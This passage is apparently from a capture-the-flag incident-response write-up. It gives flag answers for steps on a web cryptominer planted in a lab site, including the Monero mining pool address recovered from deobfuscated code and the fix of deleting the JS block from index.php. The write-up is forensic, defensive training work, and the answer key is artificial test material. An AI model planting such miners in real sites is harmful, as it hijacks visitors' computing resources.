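print(pool)  # gulf.moneroocean.stream:10128
```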

flag{map.php}

Step 6

Analyze the traffic and investigate on the host: what mining pool address does the planted web miner use? Submit the pool address (you can try to remove the miner once the investigation is done), format: flag{xxxxxxx.xxxx.xxx:xxxx}

The AI-deobfuscated code from step 5 already reveals the pool address: flag{gulf.moneroocean.stream:10128}

Step 7

After removing the obfuscated web mining code, read the flag value at /var/flag/2/flag and submit it

Just open index.php and delete that JS block.